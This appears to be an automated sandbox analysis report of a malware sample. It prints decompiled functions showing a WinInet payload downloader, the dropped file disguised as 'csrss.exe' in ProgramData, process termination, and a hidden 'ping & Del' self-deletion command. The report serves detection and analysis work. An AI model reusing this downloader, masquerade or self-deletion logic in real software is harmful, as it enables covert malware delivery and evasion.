                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00408730, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44nativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                          			E00408730(char _a4) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* _t23;
				void* _t25;
				void* _t29;

				_t1 =  &_a4; // 0x404a23
				_v16 =  *_t1;
				_v8 = 0;
				_v40 = 0x18;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0;
				if(NtOpenProcess( &_v8, 1,  &_v40,  &_v16) == 0) {
					_t23 = _v8;
					if(_t23 == 0) {
						goto L1;
					} else {
						_t25 =  *0x5d10b0(_t23, 0, _t29);
						NtClose(_v8);
						return 0 | _t25 == 0x00000000;
					}
				} else {
					L1:
					return 0;
				}
			}















                                                                                                                                          0x00408736
                                                                                                                                          0x00408739
                                                                                                                                          0x00408743
                                                                                                                                          0x00408750
                                                                                                                                          0x00408758
                                                                                                                                          0x0040875f
                                                                                                                                          0x00408766
                                                                                                                                          0x0040876d
                                                                                                                                          0x00408774
                                                                                                                                          0x0040877b
                                                                                                                                          0x0040878a
                                                                                                                                          0x00408792
                                                                                                                                          0x00408797
                                                                                                                                          0x00000000
                                                                                                                                          0x00408799
                                                                                                                                          0x0040879d
                                                                                                                                          0x004087a8
                                                                                                                                          0x004087b9
                                                                                                                                          0x004087b9
                                                                                                                                          0x0040878c
                                                                                                                                          0x0040878c
                                                                                                                                          0x00408791
                                                                                                                                          0x00408791

                                                                                                                                          APIs
                                                                                                                                          • NtOpenProcess.NTDLL(00000000,00000001,?,?), ref: 00408782
                                                                                                                                          • NtTerminateProcess.NTDLL(00000000,00000000), ref: 0040879D
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004087A8
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$CloseOpenTerminate
                                                                                                                                          • String ID: #J@
                                                                                                                                          • API String ID: 4223285941-3103836084
                                                                                                                                          • Opcode ID: 0cd67fea19399cdfc16dda180af005950f28b9e31626766ad2c06f3bb9fa3847
                                                                                                                                          • Instruction ID: 8b2c6ad6389722ad4d186c6c61001f468c4fd018603b84c5e18b7e3fb15685ad
                                                                                                                                          • Opcode Fuzzy Hash: 0cd67fea19399cdfc16dda180af005950f28b9e31626766ad2c06f3bb9fa3847
                                                                                                                                          • Instruction Fuzzy Hash: 5B010C71E0120CABDB10DFA0D948BDFBBF8EB04305F14419AE808F7280D7799A489BD5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00401800, Relevance: 2.5, APIs: 2, Instructions: 31memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E00401800(intOrPtr* _a4) {
				void* _t5;
				void* _t8;
				void* _t9;
				void _t10;
				intOrPtr* _t11;
				void* _t12;

				_t11 = _a4;
				_t5 = 0;
				if( *_t11 != 0) {
					do {
						_t5 = _t5 + 1;
					} while ( *((char*)(_t5 + _t11)) != 0);
				}
				_t8 = HeapAlloc(GetProcessHeap(), 0, _t5 + 1);
				_t10 =  *_t11;
				_t9 = _t8;
				if(_t10 != 0) {
					_t12 = _t11 - _t8;
					do {
						 *_t9 = _t10;
						_t9 = _t9 + 1;
						_t10 =  *((intOrPtr*)(_t12 + _t9));
					} while (_t10 != 0);
				}
				 *_t9 = 0;
				return _t8;
			}









                                                                                                                                          0x00401804
                                                                                                                                          0x00401807
                                                                                                                                          0x0040180b
                                                                                                                                          0x00401810
                                                                                                                                          0x00401810
                                                                                                                                          0x00401811
                                                                                                                                          0x00401810
                                                                                                                                          0x00401822
                                                                                                                                          0x00401828
                                                                                                                                          0x0040182a
                                                                                                                                          0x0040182e
                                                                                                                                          0x00401830
                                                                                                                                          0x00401832
                                                                                                                                          0x00401832
                                                                                                                                          0x00401834
                                                                                                                                          0x00401837
                                                                                                                                          0x0040183a
                                                                                                                                          0x00401832
                                                                                                                                          0x0040183e
                                                                                                                                          0x00401843

                                                                                                                                          APIs
                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000001,?,?,004052B1,?), ref: 0040181B
                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,004052B1,?), ref: 00401822
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                          • Opcode ID: 3da18ee757283d3823c3ecc1c7d213f8c7222e7c0b475c9d3fce85658518ca9d
                                                                                                                                          • Instruction ID: b73465cae51e9fc63f2ab920ad57f2ce1bbeed3a8eb4a9efde1b3dbfd0151c34
                                                                                                                                          • Opcode Fuzzy Hash: 3da18ee757283d3823c3ecc1c7d213f8c7222e7c0b475c9d3fce85658518ca9d
                                                                                                                                          • Instruction Fuzzy Hash: ECF055320092909EEB222F3488443727FE99F0B344F1C84EED8C59B3A2D63B8D48C394
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00406D50, Relevance: 1.5, APIs: 1, Instructions: 8nativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E00406D50() {
				void* _t1;

				_t1 =  *0x5d2df8; // 0x41c
				if(_t1 != 0 && _t1 != 0xffffffff) {
					return NtClose(_t1);
				}
				return _t1;
			}




                                                                                                                                          0x00406d50
                                                                                                                                          0x00406d57
                                                                                                                                          0x00000000
                                                                                                                                          0x00406d5f
                                                                                                                                          0x00406d65

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                          • Opcode ID: 9b87d2fed563e4884bb86ea922c3d925729189868286ecac45f0bef62ca048df
                                                                                                                                          • Instruction ID: 1cc971618bee3f163804a16a1d445a44e399e0157dcd427ad3a3562554af56f5
                                                                                                                                          • Opcode Fuzzy Hash: 9b87d2fed563e4884bb86ea922c3d925729189868286ecac45f0bef62ca048df
                                                                                                                                          • Instruction Fuzzy Hash: D6B0923070564157CE30AB38AC8CA1633685E6032132A0723F037E21E4EA38C8EAA61E
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00406D70, Relevance: 1.5, APIs: 1, Instructions: 8nativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E00406D70() {
				void* _t1;

				_t1 =  *0x5d2dfc; // 0x420
				if(_t1 != 0 && _t1 != 0xffffffff) {
					return NtClose(_t1);
				}
				return _t1;
			}




                                                                                                                                          0x00406d70
                                                                                                                                          0x00406d77
                                                                                                                                          0x00000000
                                                                                                                                          0x00406d7f
                                                                                                                                          0x00406d85

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                          • Opcode ID: 63ba5de6b47e9ee9e8b3dcd5553fb007b603a39dc8debe5b0c00047f8c24c2ac
                                                                                                                                          • Instruction ID: 76f8495102a0d5e2d14eb48cf16d234cca2194880bcae08c05adfe453fa08bf3
                                                                                                                                          • Opcode Fuzzy Hash: 63ba5de6b47e9ee9e8b3dcd5553fb007b603a39dc8debe5b0c00047f8c24c2ac
                                                                                                                                          • Instruction Fuzzy Hash: F4B092307055815BCE70AB79AC4CA1633686E603213150723A83BE12E4EA38C8AEA62D
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00407C30, Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 241networkCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                          			E00407C30(void* __ecx, void* __edx, void* __eflags, char* _a4, intOrPtr* _a8) {
				void _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t53;
				int _t54;
				void* _t62;
				void* _t63;
				void* _t72;
				long _t88;
				long _t103;
				char* _t108;
				intOrPtr _t109;
				char* _t111;
				void* _t114;
				long _t116;
				void* _t123;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;

				E00401BB0( &_v108, 0, 0x38);
				_t108 = _a4;
				_v24 = 0;
				_t103 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t53 = E00401850(_t108);
				_t125 = _t123 + 0x10;
				_t54 = InternetCrackUrlA(_t108, _t53, 0,  &_v112);
				if(_t54 != 0) {
					_t111 = E004015E0(_v92 + 1);
					E00401BB0(_t111, 0, _v92 + 1);
					E00401640(_t111, _v96, _v92);
					_t126 = _t125 + 0x1c;
					_t62 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
					_v20 = _t62;
					if(_t62 != 0) {
						_t63 = InternetConnectA(_t62, _t111, _v88, 0, 0, 3, 0, 0);
						_v16 = _t63;
						_push(_t111);
						if(_t63 != 0) {
							E00401510();
							E004018D0(_t108, "https://");
							_t127 = _t126 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t113 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t114 = HttpOpenRequestA(_v16, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
							_v12 = _t114;
							if(_t114 == 0) {
								L24:
								InternetCloseHandle(_v16);
								InternetCloseHandle(_v20);
								return 0;
							} else {
								_t72 = E004018D0(_t108, "https://");
								_t128 = _t127 + 8;
								if(_t72 == 0) {
									L10:
									if(HttpSendRequestA(_t114, 0, 0, 0, 0) == 0) {
										goto L23;
									} else {
										_t116 = 0x400;
										_t109 = E004015E0(0x400);
										_t129 = _t128 + 4;
										if(_t109 == 0) {
											_t114 = _v12;
											goto L23;
										} else {
											do {
												if(InternetReadFile(_v12, _t109 + _t103, _t116,  &_v24) == 0) {
													if(GetLastError() != 0x7a) {
														E00401510(_t109);
														L21:
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														return 0;
													} else {
														_t116 = _t116 + 0x400;
														goto L15;
													}
												} else {
													_t88 = _v24;
													if(_t88 == 0) {
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														 *_a8 = _t109;
														return _t103;
													} else {
														_t103 = _t103 + _t88;
														goto L15;
													}
												}
												goto L25;
												L15:
												_t109 = E004016A0(_t109, _t116 + _t103);
												_t129 = _t129 + 8;
											} while (_t109 != 0);
											goto L21;
										}
									}
								} else {
									_v8 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t114, 0x1f,  &_v8,  &_v28) == 0) {
										L23:
										InternetCloseHandle(_t114);
										goto L24;
									} else {
										_v8 = _v8 | 0x00000180;
										if(InternetSetOptionA(_t114, 0x1f,  &_v8, 4) == 0) {
											goto L23;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E00401510();
							InternetCloseHandle(_v20);
							return 0;
						}
					} else {
						E00401510(_t111);
						return 0;
					}
				} else {
					return _t54;
				}
				L25:
			}










































                                                                                                                                          0x00407c40
                                                                                                                                          0x00407c45
                                                                                                                                          0x00407c4e
                                                                                                                                          0x00407c55
                                                                                                                                          0x00407c57
                                                                                                                                          0x00407c5e
                                                                                                                                          0x00407c65
                                                                                                                                          0x00407c6f
                                                                                                                                          0x00407c76
                                                                                                                                          0x00407c7d
                                                                                                                                          0x00407c82
                                                                                                                                          0x00407c87
                                                                                                                                          0x00407c8f
                                                                                                                                          0x00407ca2
                                                                                                                                          0x00407cac
                                                                                                                                          0x00407cb8
                                                                                                                                          0x00407cbd
                                                                                                                                          0x00407ccd
                                                                                                                                          0x00407cd3
                                                                                                                                          0x00407cd8
                                                                                                                                          0x00407cfb
                                                                                                                                          0x00407d01
                                                                                                                                          0x00407d04
                                                                                                                                          0x00407d07
                                                                                                                                          0x00407d23
                                                                                                                                          0x00407d33
                                                                                                                                          0x00407d38
                                                                                                                                          0x00407d3b
                                                                                                                                          0x00407d44
                                                                                                                                          0x00407d50
                                                                                                                                          0x00407d57
                                                                                                                                          0x00407d5a
                                                                                                                                          0x00407d67
                                                                                                                                          0x00407d76
                                                                                                                                          0x00407d87
                                                                                                                                          0x00407d89
                                                                                                                                          0x00407d8e
                                                                                                                                          0x00407eb2
                                                                                                                                          0x00407eb5
                                                                                                                                          0x00407ec3
                                                                                                                                          0x00407ecd
                                                                                                                                          0x00407d94
                                                                                                                                          0x00407d9a
                                                                                                                                          0x00407d9f
                                                                                                                                          0x00407da4
                                                                                                                                          0x00407de7
                                                                                                                                          0x00407df8
                                                                                                                                          0x00000000
                                                                                                                                          0x00407dfe
                                                                                                                                          0x00407dfe
                                                                                                                                          0x00407e09
                                                                                                                                          0x00407e0b
                                                                                                                                          0x00407e10
                                                                                                                                          0x00407ea7
                                                                                                                                          0x00000000
                                                                                                                                          0x00407e16
                                                                                                                                          0x00407e16
                                                                                                                                          0x00407e2a
                                                                                                                                          0x00407e53
                                                                                                                                          0x00407e81
                                                                                                                                          0x00407e89
                                                                                                                                          0x00407e92
                                                                                                                                          0x00407e97
                                                                                                                                          0x00407e9c
                                                                                                                                          0x00407ea6
                                                                                                                                          0x00407e55
                                                                                                                                          0x00407e55
                                                                                                                                          0x00000000
                                                                                                                                          0x00407e55
                                                                                                                                          0x00407e2c
                                                                                                                                          0x00407e2c
                                                                                                                                          0x00407e31
                                                                                                                                          0x00407e66
                                                                                                                                          0x00407e6b
                                                                                                                                          0x00407e70
                                                                                                                                          0x00407e78
                                                                                                                                          0x00407e7f
                                                                                                                                          0x00407e33
                                                                                                                                          0x00407e33
                                                                                                                                          0x00000000
                                                                                                                                          0x00407e33
                                                                                                                                          0x00407e31
                                                                                                                                          0x00000000
                                                                                                                                          0x00407e35
                                                                                                                                          0x00407e3f
                                                                                                                                          0x00407e41
                                                                                                                                          0x00407e44
                                                                                                                                          0x00000000
                                                                                                                                          0x00407e48
                                                                                                                                          0x00407e10
                                                                                                                                          0x00407da6
                                                                                                                                          0x00407da9
                                                                                                                                          0x00407db0
                                                                                                                                          0x00407dc3
                                                                                                                                          0x00407eaa
                                                                                                                                          0x00407eb0
                                                                                                                                          0x00000000
                                                                                                                                          0x00407dc9
                                                                                                                                          0x00407dc9
                                                                                                                                          0x00407de1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00407de1
                                                                                                                                          0x00407dc3
                                                                                                                                          0x00407da4
                                                                                                                                          0x00407d09
                                                                                                                                          0x00407d09
                                                                                                                                          0x00407d14
                                                                                                                                          0x00407d22
                                                                                                                                          0x00407d22
                                                                                                                                          0x00407cda
                                                                                                                                          0x00407cdb
                                                                                                                                          0x00407ceb
                                                                                                                                          0x00407ceb
                                                                                                                                          0x00407c96
                                                                                                                                          0x00407c96
                                                                                                                                          0x00407c96
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • InternetCrackUrlA.WININET(00000044,00000000,?), ref: 00407C87
                                                                                                                                          • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00407CCD
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Internet$CrackOpen
                                                                                                                                          • String ID: GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                                                          • API String ID: 1262293563-1634511642
                                                                                                                                          • Opcode ID: f6c8cf70005e460737aeb64da07ddfed1755531fa4350254e23b284514829349
                                                                                                                                          • Instruction ID: 4be7173def1fabf2422f7d93ddf0ca221e4e961e0538c85c9162d68e93896e62
                                                                                                                                          • Opcode Fuzzy Hash: f6c8cf70005e460737aeb64da07ddfed1755531fa4350254e23b284514829349
                                                                                                                                          • Instruction Fuzzy Hash: BD71E471E00209BBEB10AFA1ED45BAEBBB8EF44324F104176F904F62D1D7796D10CA99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 004076A0, Relevance: 37.0, APIs: 11, Strings: 10, Instructions: 284fileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                          			E004076A0(short __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v1116;
				char _v1636;
				short _v4196;
				void* _t53;
				WCHAR* _t54;
				WCHAR* _t56;
				WCHAR* _t58;
				WCHAR* _t59;
				WCHAR* _t60;
				signed int _t62;
				WCHAR* _t66;
				WCHAR* _t81;
				WCHAR* _t82;
				void* _t87;
				void* _t88;
				WCHAR* _t103;
				WCHAR* _t107;
				WCHAR* _t110;
				int _t115;
				signed int _t120;
				WCHAR* _t121;
				WCHAR* _t122;
				void* _t140;
				intOrPtr* _t141;
				WCHAR* _t143;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t155;
				void* _t156;

				_t130 = __ecx;
				_t148 = _t147 - 0x1060;
				_t156 =  *0x5d2e00 - 0xc350; // 0x0
				if(_t156 >= 0) {
					L39:
					__eflags = 0;
					return 0;
				} else {
					_t157 =  *0x5d1c4c;
					if( *0x5d1c4c == 0) {
						goto L39;
					} else {
						E00401BB0( &_v92, 0, 0x44);
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x14], xmm0");
						_t53 = E00407C30(_t130, __edx, _t157, _a4,  &_v8);
						_t135 = _t53;
						_t149 = _t148 + 0x14;
						if(_t53 != 0) {
							_t141 = __imp__GetLongPathNameW;
							_t54 =  *_t141("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", 0x200, _t140);
							__eflags = _t54;
							if(_t54 == 0) {
								L37:
								_push(_v8);
								goto L38;
							} else {
								__eflags = _t54 - 0x200;
								if(_t54 > 0x200) {
									goto L37;
								} else {
									_t56 = E00401A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "C:\ProgramData\LKBNMTFJgl");
									_t149 = _t149 + 8;
									__eflags = _t56;
									if(_t56 != 0) {
										L10:
										_t58 = GetTempPathW(0x200,  &_v1116);
										__eflags = _t58;
										if(_t58 == 0) {
											goto L37;
										} else {
											__eflags = _t58 - 0x200;
											if(_t58 > 0x200) {
												goto L37;
											} else {
												_t59 =  &_v1116;
												_t60 =  *_t141(_t59, _t59, 0x200);
												__eflags = _t60;
												if(_t60 == 0) {
													goto L37;
												} else {
													__eflags = _t60 - 0x200;
													if(_t60 > 0x200) {
														goto L37;
													} else {
														_t62 = E00401B40( &_v1116);
														_t151 = _t149 + 4;
														__eflags =  *((short*)(_t146 + _t62 * 2 - 0x45a)) - 0x5c;
														if( *((short*)(_t146 + _t62 * 2 - 0x45a)) != 0x5c) {
															 *((short*)(_t146 + E00401B40( &_v1116) * 2 - 0x458)) = 0x5c;
															_t120 = E00401B40( &_v1116);
															_t151 = _t151 + 8;
															_t130 = 0;
															__eflags = 0;
															 *((short*)(_t146 + _t120 * 2 - 0x456)) = 0;
														}
														E00401970( &_v1116, "csrss.exe");
														_t152 = _t151 + 8;
														goto L17;
													}
												}
											}
										}
									} else {
										_t121 = E00401A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", L"ProgramData");
										_t149 = _t149 + 8;
										__eflags = _t121;
										if(_t121 != 0) {
											goto L10;
										} else {
											_t122 = E00401A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "LKBNMTFJgl");
											_t149 = _t149 + 8;
											__eflags = _t122;
											if(_t122 != 0) {
												goto L10;
											} else {
												E00401A00( &_v1116, "C:\ProgramData\LKBNMTFJgl");
												E00401970( &_v1116, "\\");
												E00401970( &_v1116, "csrss.exe");
												_t152 = _t149 + 0x18;
												E00406D50();
												L17:
												_t66 = E004087C0( &_v1116, _v8, _t135);
												_t149 = _t152 + 0xc;
												_push(_v8);
												__eflags = _t66;
												if(_t66 == 0) {
													L38:
													E00401510();
													 *0x5d2e00 =  &(( *0x5d2e00)[0]);
													__eflags =  *0x5d2e00;
													goto L39;
												} else {
													E00401510();
													_t143 = E004015E0(0x24);
													_t153 = _t149 + 8;
													__eflags = _t143;
													if(_t143 != 0) {
														_t81 = E00408B20( &_v1116, _t143);
														_t155 = _t153 + 8;
														__eflags = _t81;
														if(_t81 != 0) {
															_t143[0x10] = 0;
															_t82 = E00401740(_t143, _a16);
															_t155 = _t155 + 8;
															_push(_t143);
															__eflags = _t82;
															if(_t82 != 0) {
																goto L21;
															} else {
																E00401510();
																_t153 = _t155 + 4;
																__eflags =  *0x5d1300;
																if( *0x5d1300 == 0) {
																	L29:
																	__eflags = _a12;
																	if(_a12 != 0) {
																		E00408730(_a8);
																		_t153 = _t153 + 4;
																	}
																	 *0x5d2118 = 1;
																	_t87 =  *0x5d211c; // 0x218
																	__eflags = _t87;
																	if(_t87 == 0) {
																		L33:
																		_t88 =  *0x5d2120; // 0x0
																		__eflags = _t88;
																		if(_t88 != 0) {
																			TerminateThread(_t88, 0);
																		}
																		E00401A00( &_v4196, L"cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q \"");
																		E00401970( &_v4196, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe");
																		E00401970( &_v4196, L"\" & \"");
																		E00401970( &_v4196,  &_v1116);
																		E00401970( &_v4196, "\"");
																		_t153 = _t153 + 0x28;
																		_t103 = CreateProcessW(0,  &_v4196, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
																		__eflags = _t103;
																		if(_t103 != 0) {
																			CloseHandle(_v24.hThread);
																			CloseHandle(_v24);
																			ExitProcess(0);
																		}
																	} else {
																		_t107 = WaitForSingleObject(_t87, 0xea60);
																		__eflags = _t107;
																		if(_t107 == 0) {
																			goto L33;
																		}
																	}
																} else {
																	_t143 = E004015E0(0x400);
																	_t153 = _t153 + 4;
																	__eflags = _t143;
																	if(_t143 != 0) {
																		_t110 = E00407FA0(_t130, _t143, 0x40aad0, 7);
																		_t155 = _t153 + 0xc;
																		__eflags = _t110;
																		if(_t110 == 0) {
																			goto L20;
																		} else {
																			E00401970(_t143, "\\");
																			E00401970(_t143, "viTRMUuKeV");
																			E00401970(_t143, L".url");
																			_t155 = _t155 + 0x18;
																			E00406D70();
																			_t115 = DeleteFileW(_t143);
																			_push(_t143);
																			__eflags = _t115;
																			if(_t115 == 0) {
																				goto L21;
																			} else {
																				E00401510();
																				_t153 = _t155 + 4;
																				goto L29;
																			}
																		}
																	}
																}
															}
														} else {
															L20:
															_push(_t143);
															L21:
															E00401510();
															_t153 = _t155 + 4;
														}
													}
													DeleteFileW( &_v1116);
													 *0x5d2e00 =  &(( *0x5d2e00)[0]);
													E00401A00( &_v1636, "C:\ProgramData\LKBNMTFJgl");
													E00401970( &_v1636, "\\");
													E00401970( &_v1636, "csrss.exe");
													E00406340( &_v1636);
													__eflags = 0;
													return 0;
												}
											}
										}
									}
								}
							}
						} else {
							 *0x5d2e00 =  &(( *0x5d2e00)[0]);
							return _t53;
						}
					}
				}
			}








































                                                                                                                                          0x004076a0
                                                                                                                                          0x004076a8
                                                                                                                                          0x004076ae
                                                                                                                                          0x004076b5
                                                                                                                                          0x00407a92
                                                                                                                                          0x00407a92
                                                                                                                                          0x00407a97
                                                                                                                                          0x004076bb
                                                                                                                                          0x004076bb
                                                                                                                                          0x004076c3
                                                                                                                                          0x00000000
                                                                                                                                          0x004076c9
                                                                                                                                          0x004076d2
                                                                                                                                          0x004076da
                                                                                                                                          0x004076e1
                                                                                                                                          0x004076e5
                                                                                                                                          0x004076ea
                                                                                                                                          0x004076ec
                                                                                                                                          0x004076f1
                                                                                                                                          0x00407700
                                                                                                                                          0x00407715
                                                                                                                                          0x00407717
                                                                                                                                          0x00407719
                                                                                                                                          0x00407a7e
                                                                                                                                          0x00407a7e
                                                                                                                                          0x00000000
                                                                                                                                          0x0040771f
                                                                                                                                          0x0040771f
                                                                                                                                          0x00407724
                                                                                                                                          0x00000000
                                                                                                                                          0x0040772a
                                                                                                                                          0x00407734
                                                                                                                                          0x00407739
                                                                                                                                          0x0040773c
                                                                                                                                          0x0040773e
                                                                                                                                          0x004077ac
                                                                                                                                          0x004077b8
                                                                                                                                          0x004077be
                                                                                                                                          0x004077c0
                                                                                                                                          0x00000000
                                                                                                                                          0x004077c6
                                                                                                                                          0x004077c6
                                                                                                                                          0x004077cb
                                                                                                                                          0x00000000
                                                                                                                                          0x004077d1
                                                                                                                                          0x004077d6
                                                                                                                                          0x004077de
                                                                                                                                          0x004077e0
                                                                                                                                          0x004077e2
                                                                                                                                          0x00000000
                                                                                                                                          0x004077e8
                                                                                                                                          0x004077e8
                                                                                                                                          0x004077ed
                                                                                                                                          0x00000000
                                                                                                                                          0x004077f3
                                                                                                                                          0x004077fa
                                                                                                                                          0x004077ff
                                                                                                                                          0x00407802
                                                                                                                                          0x0040780b
                                                                                                                                          0x0040781e
                                                                                                                                          0x0040782d
                                                                                                                                          0x00407832
                                                                                                                                          0x00407835
                                                                                                                                          0x00407835
                                                                                                                                          0x00407837
                                                                                                                                          0x00407837
                                                                                                                                          0x0040784b
                                                                                                                                          0x00407850
                                                                                                                                          0x00000000
                                                                                                                                          0x00407850
                                                                                                                                          0x004077ed
                                                                                                                                          0x004077e2
                                                                                                                                          0x004077cb
                                                                                                                                          0x00407740
                                                                                                                                          0x0040774a
                                                                                                                                          0x0040774f
                                                                                                                                          0x00407752
                                                                                                                                          0x00407754
                                                                                                                                          0x00000000
                                                                                                                                          0x00407756
                                                                                                                                          0x00407760
                                                                                                                                          0x00407765
                                                                                                                                          0x00407768
                                                                                                                                          0x0040776a
                                                                                                                                          0x00000000
                                                                                                                                          0x0040776c
                                                                                                                                          0x00407778
                                                                                                                                          0x00407789
                                                                                                                                          0x0040779a
                                                                                                                                          0x0040779f
                                                                                                                                          0x004077a2
                                                                                                                                          0x00407853
                                                                                                                                          0x0040785e
                                                                                                                                          0x00407863
                                                                                                                                          0x00407866
                                                                                                                                          0x00407869
                                                                                                                                          0x0040786b
                                                                                                                                          0x00407a81
                                                                                                                                          0x00407a81
                                                                                                                                          0x00407a89
                                                                                                                                          0x00407a89
                                                                                                                                          0x00000000
                                                                                                                                          0x00407871
                                                                                                                                          0x00407871
                                                                                                                                          0x00407883
                                                                                                                                          0x00407885
                                                                                                                                          0x00407888
                                                                                                                                          0x0040788a
                                                                                                                                          0x00407894
                                                                                                                                          0x00407899
                                                                                                                                          0x0040789c
                                                                                                                                          0x0040789e
                                                                                                                                          0x00407906
                                                                                                                                          0x0040790b
                                                                                                                                          0x00407910
                                                                                                                                          0x00407913
                                                                                                                                          0x00407914
                                                                                                                                          0x00407916
                                                                                                                                          0x00000000
                                                                                                                                          0x00407918
                                                                                                                                          0x00407918
                                                                                                                                          0x0040791d
                                                                                                                                          0x00407920
                                                                                                                                          0x00407927
                                                                                                                                          0x00407995
                                                                                                                                          0x00407995
                                                                                                                                          0x00407999
                                                                                                                                          0x0040799e
                                                                                                                                          0x004079a3
                                                                                                                                          0x004079a3
                                                                                                                                          0x004079ad
                                                                                                                                          0x004079af
                                                                                                                                          0x004079b4
                                                                                                                                          0x004079b6
                                                                                                                                          0x004079cc
                                                                                                                                          0x004079cc
                                                                                                                                          0x004079d1
                                                                                                                                          0x004079d3
                                                                                                                                          0x004079d8
                                                                                                                                          0x004079d8
                                                                                                                                          0x004079ea
                                                                                                                                          0x004079fb
                                                                                                                                          0x00407a0c
                                                                                                                                          0x00407a1f
                                                                                                                                          0x00407a30
                                                                                                                                          0x00407a35
                                                                                                                                          0x00407a58
                                                                                                                                          0x00407a5e
                                                                                                                                          0x00407a60
                                                                                                                                          0x00407a6f
                                                                                                                                          0x00407a74
